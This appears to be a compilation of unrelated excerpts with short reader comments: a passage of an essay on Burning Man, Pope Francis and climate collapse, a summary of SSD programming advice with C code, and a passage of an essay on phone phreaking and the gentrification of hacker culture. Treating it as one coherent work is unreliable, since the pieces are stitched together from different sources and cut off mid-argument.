Is it possible that Pope Francis could rehabilitate the Catholic tradition, which seemed utterly hopeless, corrupt and antiquated, and turn it into a progressive force for good? We are going to need a number of miraculous conversions and transformations such as this one, if we are going to survive as a species, and learn to flourish together with nature, in the short time before it is too late to do anything but undergo a universal, horrific meltdown – a Chod ritual, on a planetary scale.
As I wrote in my books, I believe Burning Man represents an organic expression of something innate to human being-ness: We need initiatory experiences – centers where non-ordinary states of consciousness can be explored and, also, interpreted, with a shared context for understanding and integration. Emerging from the psychedelic culture of the Bay Area, Burning Man is, to a certain extent, a postmodern reinvention of centers of Mystery School wisdom, like Eleusis, which the artists, philosophers, and leaders of the Classical World visited each year. However, at this point, it lacks a deeper awareness of its own value and purpose. Without this, it is in danger of becoming another appendage of the military-industrial-entertainment complex – another distraction factory.
I find that many people I know are living on the razor-edge of nihilism right now, skating the edge of the Void. In my own life, I have lived through the eruption and the projection of my own shadow material – and I see many people undergoing their own versions of this, in different areas of their lives. I can’t help but see this as a perfectly appropriate and even necessary part of a process that could lead to our apotheosis as a species (the birth of the Übermensch, who, according to Nietzsche, represents the fusion of “the mind of Caesar” with “the soul of Christ”) or our collective dissolution. It is exciting that this process seems to be happening within our current lifespans.
The infusion of Eastern metaphysics into the Western worldview is not necessarily helping, and it may actually be exacerbating our current crisis of values. The popular Buddhist monk Thich Nhat Hanh has recently noted that, within 100 years, the human race may go extinct. His perspective is accurate, according to scientific predictions. He notes, with an accelerated warming cycle like the one that caused the Permian Mass Extinction, 250 million years ago, “another 95 per cent of species will die out, including Homo sapiens. That is why we have to learn to touch eternity with our in breath and out breath. Extinction of species has happened several times. Mass extinction has already happened five times and this one is the sixth. According to the Buddhist tradition there is no birth and no death. After extinction things will reappear in other forms, so you have to breathe very deeply in order to acknowledge the fact that we humans may disappear in just 100 years on earth.”
There is a kind of fatalism to Buddhist thought that doesn’t mesh with our Western approach to reality. Personally, I find myself resonating far more deeply with the Pope’s call for a new spiritual mission that unifies humanity behind protecting life and nature, than I do with Nhat Hanh’s view, although I recognize the validity of his statement. Ultimately, there is only the white light of the Void, which certain psychedelic experiences – particularly 5-meo-DMT – experientially confirm. However, there are many other dimensions of being and levels of consciousness we can know and experience. We also possess creative, empathic, and imaginative capacities, which seem to be a divine power and dispensation. I think it would be truly amazing if we chose to make use of our deepest abilities to reverse the current direction of our society – to confront the ecological mega-crisis as a true initiation, and offer ourselves as vessels of this transformation.
In order to accomplish this, we would need to overcome our desire for spectacular distraction and insatiable consumption. Burning Man has always drawn its imaginative power from the paradoxes which are essential to it. A huge amount of money, energy, time, and fossil fuel is expended to create conditions which are difficult and force people (except for those wealthy enough to have air-tight sanctuaries built for them) to undergo a certain level of inner confrontation. I think we could further generalize from this, realizing that difficult and uncomfortable conditions are, in fact, necessary for our own development.
I will wrap this up, for now. The main point is there are many crucial lessons to learn from Burning Man: In many ways, it reveals our innate capacities to build a new society, a redesigned society, based on creativity, community, inspiration, and compassion. At the same time, Burning Man has become another spectacle – another cultural phenomenon, in a sense, a cult – and one that sucks a huge amount of energy and time from people who could re-focus their talents and genius on what we must do to escape ecological collapse (building a resilient or regenerative society). The organization, itself, needs to undergo another level of self-analysis and transformation – much like the Catholic Church appears to be doing, under Pope Francis’ lead.
In order to survive what’s coming, we must find a way to awaken a new spiritual impulse in the human community, beginning with our cultural, technocratic, and financial elites. And we don’t have time to waste.
Nice NLP library (sentiment analysis, tokenization…)
Basics
A solid-state drive (SSD) is a flash-memory based data storage device. Bits are stored in cells, which come in three types: 1 bit per cell (single-level cell, SLC), 2 bits per cell (multi-level cell, MLC), and 3 bits per cell (triple-level cell, TLC).
See also: Section 1.1
Each cell has a maximum number of P/E cycles (Program/Erase), after which the cell is considered defective. This means that NAND-flash memory wears off and has a limited lifespan.
See also: Section 1.1
Testers are human, therefore not all benchmarks are free of errors. Be careful when reading benchmarks from manufacturers or third parties, and use multiple sources before trusting any numbers. Whenever possible, run your own in-house benchmarks using the specific workload of your system, along with the specific SSD model that you want to use. Finally, make sure you look at the performance metrics that matter most for the system at hand.
See also: Sections 2.2 and 2.3
Pages and blocks
Cells are grouped into a grid, called a block, and blocks are grouped into planes. The smallest unit through which a block can be read or written is a page. Pages cannot be erased individually; only whole blocks can be erased. The size of a NAND-flash page can vary, and most drives have pages of 2 KB, 4 KB, 8 KB or 16 KB. Most SSDs have blocks of 128 or 256 pages, which means that the size of a block can vary between 256 KB and 4 MB. For example, the Samsung SSD 840 EVO has blocks of size 2048 KB, and each block contains 256 pages of 8 KB each.
See also: Section 3.2
It is not possible to read less than one page at once. One can of course request just one byte from the operating system, but a full page will be retrieved in the SSD, forcing far more data to be read than necessary.
See also: Section 3.2
When writing to an SSD, writes happen in increments of the page size. So even if a write operation affects only one byte, a whole page will be written anyway. Writing more data than necessary is known as write amplification. Writing to a page is also called “programming” a page.
See also: Section 3.2
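To make the arithmetic concrete, here is a small C sketch that estimates this effect, assuming a hypothetical 16 KB page (the real page size depends on the drive):

```c
#include <stdio.h>

/* Assumed NAND-flash page size; the real value depends on the drive model. */
#define PAGE_SIZE (16 * 1024)

/* Estimate the write amplification of `count` logical writes of `bytes`
 * bytes each: every write is rounded up to a whole number of pages. */
static double write_amplification(size_t bytes, size_t count)
{
    size_t pages_per_write = (bytes + PAGE_SIZE - 1) / PAGE_SIZE;
    double physical = (double)pages_per_write * PAGE_SIZE * count;
    double logical  = (double)bytes * count;
    return physical / logical;
}

int main(void)
{
    /* A 1-byte write still programs a whole 16 KB page: factor of 16384. */
    printf("WA for 1-byte writes: %.0f\n", write_amplification(1, 1000));
    /* A full-page write programs exactly one page: factor of 1. */
    printf("WA for 16 KB writes:  %.0f\n", write_amplification(PAGE_SIZE, 1000));
    return 0;
}
```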
A NAND-flash page can be written to only if it is in the “free” state. When data is changed, the content of the page is copied into an internal register, the data is updated, and the new version is stored in a “free” page, an operation called “read-modify-write”. The data is not updated in-place, as the “free” page is a different page than the page that originally contained the data. Once the data is persisted to the drive, the original page is marked as being “stale”, and will remain as such until it is erased.
See also: Section 3.2
Pages cannot be overwritten, and once they become stale, the only way to make them free again is to erase them. However, it is not possible to erase individual pages, and it is only possible to erase whole blocks at once.
See also: Section 3.2
SSD controller and internals
The Flash Translation Layer (FTL) is a component of the SSD controller which maps Logical Block Addresses (LBA) from the host to Physical Block Addresses (PBA) on the drive. Most recent drives implement an approach called “hybrid log-block mapping” or one of its derivatives, which works in a way that is similar to log-structured file systems. This allows random writes to be handled like sequential writes.
See also: Section 4.2
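As an illustration of the idea only (real FTL firmware is far more sophisticated and not publicly documented), here is a toy C sketch of log-style remapping: each logical write is appended to the next free physical page, the mapping table is updated, and the previously mapped page is marked stale instead of being overwritten in place:

```c
#include <stdint.h>

#define NPAGES 1024   /* toy capacity, in pages */

/* Toy model of the log-block idea: logical pages are remapped to wherever
 * their data was last written, so random logical writes become sequential
 * physical writes. */
struct toy_ftl {
    int32_t map[NPAGES];    /* logical page -> physical page (-1 = unmapped) */
    uint8_t stale[NPAGES];  /* physical pages waiting for garbage collection */
    int32_t next_free;      /* next physical page in the "log" */
};

static void ftl_init(struct toy_ftl *ftl)
{
    for (int32_t i = 0; i < NPAGES; i++) {
        ftl->map[i] = -1;
        ftl->stale[i] = 0;
    }
    ftl->next_free = 0;
}

/* Write a logical page: append at the head of the log, update the map,
 * and mark the old physical page stale instead of overwriting in place. */
static int32_t ftl_write(struct toy_ftl *ftl, int32_t logical)
{
    if (ftl->next_free >= NPAGES)
        return -1;                    /* log full: garbage collection needed */

    int32_t old = ftl->map[logical];
    if (old >= 0)
        ftl->stale[old] = 1;

    int32_t physical = ftl->next_free++;
    ftl->map[logical] = physical;
    return physical;
}
```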
Internally, several levels of parallelism allow writing to several blocks at once across different NAND-flash chips, forming what is called a “clustered block”.
See also: Section 6
Because NAND-flash cells wear out, one of the main goals of the FTL is to distribute the work among cells as evenly as possible, so that blocks reach their P/E cycle limit and wear out at the same time.
See also: Section 3.4
The garbage collection process in the SSD controller ensures that “stale” pages are erased and restored into a “free” state so that the incoming write commands can be processed.
See also: Section 4.4
Background operations such as garbage collection can negatively impact foreground operations from the host, especially in the case of a sustained workload of small random writes.
See also: Section 4.4
Access patterns
Avoid writing chunks of data that are below the size of a NAND-flash page, to minimize write amplification and prevent read-modify-write operations. The largest page size at the moment is 16 KB, so it is the value that should be used by default. This size depends on the SSD model, and you may need to increase it in the future as SSDs improve.
See also: Sections 3.2 and 3.3
Align writes
Align writes on the page size, and write chunks of data that are multiples of the page size.
See also: Sections 3.2 and 3.3
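On Linux, one way to make sure writes reach the drive aligned is to combine posix_memalign with O_DIRECT, as in this minimal sketch; the 16 KB page size is an assumption, and O_DIRECT requires the buffer, the offset and the length to all be aligned:

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PAGE_SIZE (16 * 1024)   /* assumed NAND page size; check your drive */

int aligned_write_example(const char *path)
{
    /* O_DIRECT bypasses the page cache; it requires the buffer, the file
     * offset and the length to be aligned (here to the assumed page size). */
    int fd = open(path, O_WRONLY | O_CREAT | O_DIRECT, 0644);
    if (fd < 0)
        return -1;

    void *buf;
    if (posix_memalign(&buf, PAGE_SIZE, PAGE_SIZE) != 0) {
        close(fd);
        return -1;
    }
    memset(buf, 'x', PAGE_SIZE);

    /* Write exactly one page at a page-aligned offset. */
    ssize_t n = pwrite(fd, buf, PAGE_SIZE, 0);

    free(buf);
    close(fd);
    return n == PAGE_SIZE ? 0 : -1;
}
```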
To maximize throughput, whenever possible keep small writes in a buffer in RAM, and when the buffer is full, perform a single large write to batch all the small writes.
See also: Sections 3.2 and 3.3
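A minimal sketch of this buffering pattern, with an illustrative 1 MB batch size: small records accumulate in RAM and only reach the drive as one large write when the buffer fills up (the caller flushes once more at the end, and adds fsync if durability matters):

```c
#include <string.h>
#include <unistd.h>

#define BUF_SIZE (1024 * 1024)   /* illustrative 1 MB batch size */

struct write_buffer {
    char   data[BUF_SIZE];
    size_t used;
    int    fd;
};

/* Flush the accumulated small writes as one large write. */
static int wb_flush(struct write_buffer *wb)
{
    if (wb->used == 0)
        return 0;
    ssize_t n = write(wb->fd, wb->data, wb->used);
    if (n != (ssize_t)wb->used)
        return -1;
    wb->used = 0;
    return 0;
}

/* Append a small record; only hit the drive when the buffer is full. */
static int wb_append(struct write_buffer *wb, const void *rec, size_t len)
{
    if (len > BUF_SIZE)
        return -1;
    if (wb->used + len > BUF_SIZE && wb_flush(wb) != 0)
        return -1;
    memcpy(wb->data + wb->used, rec, len);
    wb->used += len;
    return 0;
}
```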
Read performance is a consequence of the write pattern. When a large chunk of data is written at once, it is spread across separate NAND-flash chips. Thus you should write related data in the same page, block, or clustered block, so it can later be read faster with a single I/O request, by taking advantage of the internal parallelism.
See also: Section 7.3
A workload made of a mix of small interleaved reads and writes will prevent the internal caching and readahead mechanisms from working properly, and will cause the throughput to drop. It is best to avoid simultaneous reads and writes, and to perform them one after the other in large chunks, preferably of the size of the clustered block. For example, if 1000 files have to be updated, you could iterate over the files, doing a read and a write on one file and then moving to the next file, but that would be slow. It would be better to read all 1000 files at once and then write back to those 1000 files at once.
See also: Section 7.4
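A sketch of that two-phase pattern, using plain stdio and skipping error handling for brevity; the in-memory “update” is just a placeholder:

```c
#include <stdio.h>
#include <stdlib.h>

/* Read a whole file into a malloc'd buffer (sketch: no error handling). */
static char *slurp(const char *path, long *len)
{
    FILE *f = fopen(path, "rb");
    fseek(f, 0, SEEK_END);
    *len = ftell(f);
    rewind(f);
    char *buf = malloc(*len);
    fread(buf, 1, (size_t)*len, f);
    fclose(f);
    return buf;
}

/* Write a buffer back to a file. */
static void spit(const char *path, const char *data, long len)
{
    FILE *f = fopen(path, "wb");
    fwrite(data, 1, (size_t)len, f);
    fclose(f);
}

/* Update many files in two large phases: read them all, modify in memory,
 * then write them all back, instead of interleaving a small read and a
 * small write per file. */
void update_files(const char **paths, size_t count)
{
    char **contents = calloc(count, sizeof(*contents));
    long  *lengths  = calloc(count, sizeof(*lengths));

    for (size_t i = 0; i < count; i++)            /* phase 1: all the reads */
        contents[i] = slurp(paths[i], &lengths[i]);

    for (size_t i = 0; i < count; i++)            /* in-memory update */
        if (lengths[i] > 0)
            contents[i][0] = '#';

    for (size_t i = 0; i < count; i++)            /* phase 2: all the writes */
        spit(paths[i], contents[i], lengths[i]);

    for (size_t i = 0; i < count; i++)
        free(contents[i]);
    free(contents);
    free(lengths);
}
```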
When some data is no longer needed or needs to be deleted, it is better to wait and invalidate it in large batches in a single operation. This will allow the garbage collection process to handle larger areas at once and will help minimize internal fragmentation.
See also: Section 4.4
If the writes are small (i.e. below the size of the clustered block), then random writes are slower than sequential writes.
If writes are both multiples of and aligned to the size of a clustered block, the random writes will use all the available levels of internal parallelism, and will perform just as well as sequential writes. For most drives, the clustered block has a size of 16 MB or 32 MB, therefore it is safe to use 32 MB.
See also: Section 7.2
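A minimal sketch of random writes issued at clustered-block granularity; the 32 MB figure is an assumption about the drive, and `file_blocks` is the file size expressed in clustered blocks:

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CLUSTERED_BLOCK (32u * 1024 * 1024)   /* assumed; drive-dependent */

/* Issue `count` random writes that are aligned to, and multiples of, the
 * assumed clustered block size, so that each write can use the drive's
 * internal parallelism as well as a sequential write would. */
int random_block_writes(int fd, size_t file_blocks, size_t count)
{
    void *buf;
    if (posix_memalign(&buf, 4096, CLUSTERED_BLOCK) != 0)
        return -1;
    memset(buf, 0, CLUSTERED_BLOCK);

    for (size_t i = 0; i < count; i++) {
        /* Pick a random clustered-block-aligned offset inside the file. */
        off_t offset = (off_t)(rand() % file_blocks) * CLUSTERED_BLOCK;
        if (pwrite(fd, buf, CLUSTERED_BLOCK, offset) != (ssize_t)CLUSTERED_BLOCK) {
            free(buf);
            return -1;
        }
    }
    free(buf);
    return 0;
}
```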
Concurrent random reads cannot fully make use of the readahead mechanism. In addition, multiple Logical Block Addresses may end up on the same chip, not taking advantage of the internal parallelism. A large read operation will access sequential addresses and will therefore be able to use the readahead buffer if present, and use the internal parallelism. Consequently, if the use case allows it, it is better to issue a large read request.
See also: Section 7.3
A large single-threaded write request offers the same throughput as many small concurrent writes; however, in terms of latency, a single large write has a better response time than concurrent writes. Therefore, whenever possible, it is best to perform large single-threaded writes.
See also: Section 7.2
Many concurrent small write requests will offer a better throughput than a single small write request. So if the I/O is small and cannot be batched, it is better to use multiple threads.
See also: Section 7.2
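When the small writes really cannot be batched, a few threads issuing them concurrently can keep more of the drive busy than a single thread. A minimal pthread sketch, with illustrative sizes and a hard-coded thread cap:

```c
#include <pthread.h>
#include <unistd.h>

#define SMALL_WRITE       4096   /* illustrative small request size */
#define WRITES_PER_THREAD 1024

struct worker {
    int   fd;
    off_t base;                  /* each thread writes its own region */
};

static void *small_write_worker(void *arg)
{
    struct worker *w = arg;
    char buf[SMALL_WRITE] = {0};
    for (int i = 0; i < WRITES_PER_THREAD; i++)
        pwrite(w->fd, buf, SMALL_WRITE, w->base + (off_t)i * SMALL_WRITE);
    return NULL;
}

/* Several threads issuing small writes concurrently can reach a higher
 * throughput than a single thread issuing the same small writes. */
void concurrent_small_writes(int fd, int nthreads)
{
    pthread_t tids[16];
    struct worker workers[16];
    if (nthreads > 16)
        nthreads = 16;

    for (int i = 0; i < nthreads; i++) {
        workers[i].fd = fd;
        workers[i].base = (off_t)i * WRITES_PER_THREAD * SMALL_WRITE;
        pthread_create(&tids[i], NULL, small_write_worker, &workers[i]);
    }
    for (int i = 0; i < nthreads; i++)
        pthread_join(tids[i], NULL);
}
```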
Hot data is data that changes frequently, and cold data is data that changes infrequently. If some hot data is stored in the same page as some cold data, the cold data will be copied along every time the hot data is updated in a read-modify-write operation, and will be moved along during garbage collection for wear leveling. Splitting cold and hot data as much as possible into separate pages will make the job of the garbage collector easier.
See also: Section 4.4
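One simple way to apply this at the application level is to keep hot and cold data in separate files, so frequently rewritten bytes never share pages with long-lived ones; the file names below are purely hypothetical:

```c
#include <fcntl.h>
#include <unistd.h>

/* Keep frequently updated ("hot") and rarely updated ("cold") data in
 * separate files so they never share the same NAND-flash pages. */
struct store {
    int hot_fd;    /* e.g. counters, session state: rewritten often */
    int cold_fd;   /* e.g. historical records: written once, kept   */
};

int store_open(struct store *s)
{
    s->hot_fd  = open("data.hot",  O_RDWR | O_CREAT, 0644);
    s->cold_fd = open("data.cold", O_RDWR | O_CREAT, 0644);
    return (s->hot_fd < 0 || s->cold_fd < 0) ? -1 : 0;
}

/* Hot path: frequent in-place updates go to the hot file only. */
ssize_t store_update_counter(struct store *s, off_t off, const void *v, size_t len)
{
    return pwrite(s->hot_fd, v, len, off);
}

/* Cold path: rarely touched records go to the cold file. */
ssize_t store_append_record(struct store *s, off_t off, const void *v, size_t len)
{
    return pwrite(s->cold_fd, v, len, off);
}
```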
Extremely hot data and other high-change metadata should be buffered as much as possible and written to the drive as infrequently as possible.
See also: Section 4.4
System optimizations
The two main host interfaces offered by manufacturers are SATA 3.0 (550 MB/s) and PCI Express 3.0 (1 GB/s per lane, using multiple lanes). Serial Attached SCSI (SAS) is also available for enterprise SSDs. In their latest versions, PCI Express and SAS are faster than SATA, but they are also more expensive.
See also: Section 2.1
A drive can be over-provisioned simply by formatting it to a logical partition capacity smaller than the maximum physical capacity. The remaining space, invisible to the user, will still be visible to and used by the SSD controller. Over-provisioning helps the wear-leveling mechanisms cope with the inherently limited lifespan of NAND-flash cells. For workloads that are not write-heavy, 10% to 15% of over-provisioning is enough. For workloads of sustained random writes, keeping up to 25% of over-provisioning will improve performance. The over-provisioned space acts as a buffer of NAND-flash blocks, helping the garbage collection process absorb peaks of writes.
See also: Section 5.2
Make sure your kernel and filesystem support the TRIM command. The TRIM command notifies the SSD controller when a block is deleted. The garbage collection process can then erase blocks in the background during idle times, preparing the drive to face large write workloads.
See also: Section 5.1
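On Linux, TRIM can be applied continuously with the discard mount option or in batches with the fstrim utility; the latter boils down to the FITRIM ioctl, as in this sketch (it assumes a kernel and filesystem with TRIM support, and usually requires root):

```c
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/fs.h>   /* FITRIM, struct fstrim_range */
#include <unistd.h>

/* Ask the filesystem mounted at `mountpoint` to TRIM all of its free
 * space, which is essentially what fstrim(8) does. */
int trim_filesystem(const char *mountpoint)
{
    int fd = open(mountpoint, O_RDONLY);
    if (fd < 0)
        return -1;

    struct fstrim_range range;
    memset(&range, 0, sizeof(range));
    range.len = ULLONG_MAX;          /* cover the whole filesystem */

    int rc = ioctl(fd, FITRIM, &range);
    close(fd);
    return rc;
}
```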
To ensure that logical writes are truly aligned to the physical memory, you must align the partition to the NAND-flash page size of the drive.
See also: Section 8.1
Conclusion
This summary concludes the “Coding for SSDs” article series. I hope that I was able to convey in an understandable manner what I have learned during my personal research on solid-state drives.
If, after reading this series of articles, you want to go deeper into SSDs, a good first step would be to read some of the publications and articles linked in the reference sections of Parts 2 to 5.
Another great resource is the FAST conference (the USENIX Conference on File and Storage Technologies). A lot of excellent research is being presented there every year. I highly recommend their website, a good starting point being the videos and publications for FAST 2013.
Quite interesting, especially the part on the gentrification process (reminds me of a certain Black Mirror episode…)
Any large and alienating infrastructure controlled by a technocratic elite is bound to provoke. In particular, it will nettle those who want to know how it works, those who like the thrill of transgressing, and those who value the principle of open access. Take the US telephone network of the 1960s: a vast array of physical infrastructure dominated by a monopolistic telecoms corporation called AT&T. A young Air Force serviceman named John Draper – aka Captain Crunch – discovered that he could manipulate the rules of tone-dialling systems by using children’s whistles found in Cap’n Crunch cereal boxes. By whistling the correct tone into a telephone handset, he could place free long-distance calls through a chink in the AT&T armour.
Draper was one of the first phone phreakers, a motley crew of jokers bent on exploring and exploiting loopholes in the system to gain free access. Through the eyes of conventional society, such phreakers were just juvenile pranksters and cheapskates. Yet their actions have since been incorporated into the folklore of modern hacker culture. Draper said in a 1995 interview: ‘I was mostly interested in the curiosity of how the phone company worked. I had no real desire to go rip them off and steal phone service.’
But in his book Hackers: Heroes of the Computer Revolution (1984), the US journalist Steven Levy went so far as to hold up Draper as an avatar of the ‘true hacker’ spirit. Levy was trying to home in on principles that he believed constituted a ‘hacker ethic’. One such principle was the ‘hands-on imperative’:
Hackers believe that essential lessons can be learned about the systems – about the world – from taking things apart, seeing how they work, and using this knowledge to create new and even more interesting things.
For all his protestations of innocence, it’s clear that Draper’s curiosity was essentially subversive. It represented a threat to the ordered lines of power within the system. The phreakers were trying to open up information infrastructure, and in doing so they showed a calculated disregard for the authorities that dominated it.
This spirit has carried through into the modern context of the internet, which, after all, consists of computers connected to one another via physical telecommunications infrastructure. The internet promises open access to information and online assembly for individual computer owners. At the same time, it serves as a tool for corporate monopolists and government surveillance. The most widely recognised examples of modern ‘hackers’ are therefore groups such as Anonymous and WikiLeaks. These ‘cypherpunks’ and crypto-anarchists are internet natives. They fight – at least in principle – to protect the privacy of the individual while making power itself as transparent as possible.
This dynamic is not unique to the internet. It plays out in many other spheres of life. Consider the pranksters who mess with rail operators by jamming ticket-barrier gates to keep them open for others. They might not describe themselves as hackers, but they carry an ethic of disdain towards systems that normally allow little agency on the part of ordinary individuals. Such hacker-like subcultures do not necessarily see themselves in political terms. Nevertheless, they share a common tendency towards a rebellious creativity aimed at increasing the agency of underdogs.
Unlike the open uprising of the liberation leader, the hacker impulse expresses itself via a constellation of minor acts of insurrection, often undertaken by individuals, creatively disguised to deprive authorities of the opportunity to retaliate. Once you’re attuned to this, you see hacks everywhere. I see it in capoeira. What is it? A dance? A fight? It is a hack, one that emerged in colonial Brazil as a way for slaves to practise a martial art under the guise of dance. As an approach to rebellion, this echoes the acts of subtle disobedience described by James Scott in Weapons of the Weak: Everyday Forms of Peasant Resistance (1985).
Hacking, then, looks like a practice with very deep roots – as primally and originally human as disobedience itself. Which makes it all the more disturbing that hacking itself appears to have been hacked.
Despite the hive-mind connotations of faceless groups such as Anonymous, the archetype of ‘the hacker’ is essentially that of an individual attempting to live an empowered and unalienated life. It is outsider in spirit, seeking empowerment outside the terms set by the mainstream establishment.
Perhaps it’s unwise to essentialise this figure. A range of quite different people can think of themselves in those terms, from the lonely nerd tinkering away on DIY radio in the garage to the investigative journalist immersed in politicised muckraking. It seems safe to say, though, that it’s not very hacker-like to aspire to conventional empowerment, to get a job at a blue-chip company while reading The Seven Habits of Highly Effective People. The hacker impulse is critical. It defies, for example, corporate ambitions.
In my book The Heretic’s Guide to Global Finance (2013), I used this figure of the hacker as a model for readers wishing to challenge the global financial system. The machinery of global capital tends to be seen as complex, disempowering and alienating. The traditional means of contesting it is to build groups – such as Occupy Wall Street – to influence politicians and media to pressure it on your behalf. But this sets up a familiar dynamic: the earnest activist pitted against the entrenched interests of the business elite. Each group defines itself against the other, settling into a stagnant trench warfare. The individual activists frequently end up demoralised, complaining within echo-chambers about their inability to impact ‘the system’. They build an identity based on a kind of downbeat martyrdom, keeping themselves afloat through a fetishised solidarity with others in the same position.
I was attracted to the hacker archetype because, unlike the straightforward activist who defines himself in direct opposition to existing systems, hackers work obliquely. The hacker is ambiguous, specialising in deviance from established boundaries, including ideological battle lines. It’s a trickster spirit, subversive and hard to pin down. And, arguably, rather than aiming towards some specific reformist end, the hacker spirit is a ‘way of being’, an attitude towards the world.
Take, for example, the urban explorer subculture, chronicled by Bradley Garrett in Explore Everything: Placehacking the City (2013). The search for unusual detours – through a sewer system, for example – is exhilarating because you see things that you’re not supposed to be interested in. Your curiosity takes you to places where you don’t belong. It thus becomes an assertion of individual defiance of social norms. The byproduct of such exploration is pragmatic knowledge, the disruption of standard patterns of thought, and also dealienation – you see what’s behind the interfaces that surround us, coming closer to the reality of our social world.
This is a useful sensibility to cultivate in the face of systems that create psychological, political and economic barriers to access. In the context of a complex system – computer, financial or underground transit – the political divide is always between well-organised, active insiders versus diffuse, passive outsiders. Hackers challenge the binary by seeking access, either by literally ‘cracking’ boundaries – breaking in – or by redefining the lines between those with permission and those without. We might call this appropriation.
A figure of economic power such as a factory owner builds a machine to extend control. The activist Luddite might break it in rebellion. But the hacker explores and then modifies the machine to make it self-destruct, or programmes it to frustrate the purpose of its owners, or opens its usage to those who do not own it. The hacker ethic is therefore a composite. It is not merely exploratory curiosity or rebellious deviance or creative innovation within incumbent systems. It emerges from the intersection of all three.
The word ‘hacker’ came into its own in the age of information technology (IT) and the personal computer. The subtitle of Levy’s seminal book – Heroes of the Computer Revolution – immediately situated hackers as the crusaders of computer geek culture. While some hacker principles he described were broad – such as ‘mistrust authority’ and ‘promote decentralisation’ – others were distinctly IT-centric. ‘You can create art and beauty on a computer,’ read one. ‘All information should be free,’ declared another.
Ever since, most popular representations of the hacker way have followed Levy’s lead. Neal Stephenson’s cyberpunk novel Snow Crash (1992) featured the code-wielding Hiro as the ‘last of the freelance hackers’. The film Hackers (1995) boasted a youthful crew of jargon-rapping, keyboard-hammering computer ninjas. The media stereotype that began to be constructed was of a precocious computer genius using his technological mastery to control events or battle others. It remains popular to this day. In the James Bond film Skyfall (2012), the gadget-master Q is reinvented by the actor Ben Whishaw as a young hacker with a laptop, controlling lines of code with almost superhuman efficiency, as if his brain was wired directly into the computer.
In a sense, then, computers were the making of the hacker, at least as a popular cultural image. But they were also its undoing. If the popular imagination hadn’t chained the hacker figure so forcefully to IT, it’s hard to believe it ever would have been demonised in the way it has been, or that it could have been so effectively defanged.
Computers, and especially the internet, are a primary means of subsistence for many. This understandably increases public anxiety at the bogeyman figure of the criminal ‘hacker’, the dastardly villain who breaches computer security to steal and cause havoc. Never mind that in ‘true’ hacker culture – as found in hackerspaces, maker-labs and open-source communities around the world – the mechanical act of breaking into a computer is just one manifestation of the drive to explore beyond established boundaries. In the hands of a sensationalist media, the ethos of hacking is conflated with the act of cracking computer security. Anyone who does that, regardless of the underlying ethos, is a ‘hacker’. Thus a single manifestation of a single element of the original spirit gets passed off as the whole.
Through the lens of moral panic, a narrative emerges of hackers as a class of computer attack-dogs. Their primary characteristics become aggression and amorality. How to guard against them? How, indeed, to round out the traditional good-versus-evil narrative? Well, naturally, with a class of poacher-turned-gamekeepers. And so we find the construction of ‘white-hat’ hackers, protective and upstanding computer wizards for the public good.
Here is where the second form of corruption begins to emerge. The construct of the ‘good hacker’ has paid off in unexpected ways, because in our computerised world we have also seen the emergence of a huge, aggressively competitive technology industry with a serious innovation obsession. This is the realm of startups, venture capitalists, and shiny corporate research and development departments. And, it is here, in subcultures such as Silicon Valley, that we find a rebel spirit succumbing to perhaps the only force that could destroy it: gentrification.
Gentrification is the process by which nebulous threats are pacified and alchemised into money. A raw form – a rough neighbourhood, indigenous ritual or edgy behaviour such as parkour (or free running) – gets stripped of its otherness and repackaged to suit mainstream sensibilities. The process is repetitive. Desirable, unthreatening elements of the source culture are isolated, formalised and emphasised, while the unsettling elements are scrubbed away.
Key to any gentrification process are successive waves of pioneers who gradually reduce the perceived risk of the form in question. In property gentrification, this starts with the artists and disenchanted dropouts from mainstream society who are drawn to marginalised areas. Despite their countercultural impulses, they always carry with them traces of the dominant culture, whether it be their skin colour or their desire for good coffee. This, in turn, creates the seeds for certain markets to take root. A WiFi coffeeshop appears next to the Somalian community centre. And that, in turn, sends signals back into the mainstream that the area is slightly less alien than it used to be.
If you repeat this cycle enough times, the perceived dangers that keep the property developers and yuppies away gradually erode. Suddenly, the tipping point arrives. Through a myriad of individual actions under no one person’s control, the exotic other suddenly appears within a safe frame: interesting, exciting and cool, but not threatening. It becomes open to a carefree voyeurism, like a tiger being transformed into a zoo animal, and then a picture, and then a tiger-print dress to wear at cocktail parties. Something feels ‘gentrified’ when this shallow aesthetic of tiger takes over from the authentic lived experience of tiger.
This is not just about property. In cosmetics shops on Oxford Street in London you can find beauty products blazoned with pagan earth-mother imagery. Why are symbols of earth-worship found within the citadels of consumerism, printed on products designed to neutralise and control bodily processes? They’ve been gentrified. Pockets of actual paganism do still exist, but in the mainstream such imagery has been thoroughly cleansed of any subversive context.
At the frontiers of gentrification are entire ways of being – lifestyles, subcultures and outlooks that carry rebellious impulses. Rap culture is a case in point: from its ghetto roots, it has crossed over to become a safe ‘thing that white people like’. Gentrification is an enabler of doublethink, a means by which people in positions of relative power can, without contradiction, embrace practices that were formed in resistance to the very things they themselves represent.
We are currently witnessing the gentrification of hacker culture. The countercultural trickster has been pressed into the service of the preppy tech entrepreneur class. It began innocently, no doubt. The association of the hacker ethic with startups might have started with an authentic counter-cultural impulse on the part of outsider nerds tinkering away on websites. But, like all gentrification, the influx into the scene of successive waves of ever less disaffected individuals results in a growing emphasis on the unthreatening elements of hacking over the subversive ones.
Silicon Valley has come to host, on the one hand, a large number of highly educated tech-savvy people who loosely perceive themselves as rebels set against existing modes of doing business. On the other hand, it contains a very large pool of venture capital. The former group jostles for investor money by explicitly attempting to build network monopolies – such as those created by Facebook and Google – for the purpose of extracting windfall profits for the founders, for the investors that back them and, perhaps, for the large corporates who will buy them out.
In this economic context, curiosity, innovation and iterative experimentation are ultimate virtues, and this element of the hacker ethic has proved to be an appealing frame for people to portray their actions within. Traits such as the drive for individual empowerment and the appreciation of clever solutions already resemble the traits of the entrepreneur. In this setting, the hacker attitude of playful troublemaking can be cast in Schumpeterian terms: success-driven innovators seeking to ‘disrupt’ old incumbents within a market in an elite ‘rebellion’.
Thus the emergent tech industry’s definition of ‘hacking’ as quirky-but-edgy innovation by optimistic entrepreneurs with a love of getting things done. Nothing sinister about it: it’s just on-the-fly problem-solving for profit. This gentrified pitch is not just a cool personal narrative. It’s also a useful business construct, helping the tech industry to distinguish itself from the aggressive squares of Wall Street, competing for the same pool of new graduates.
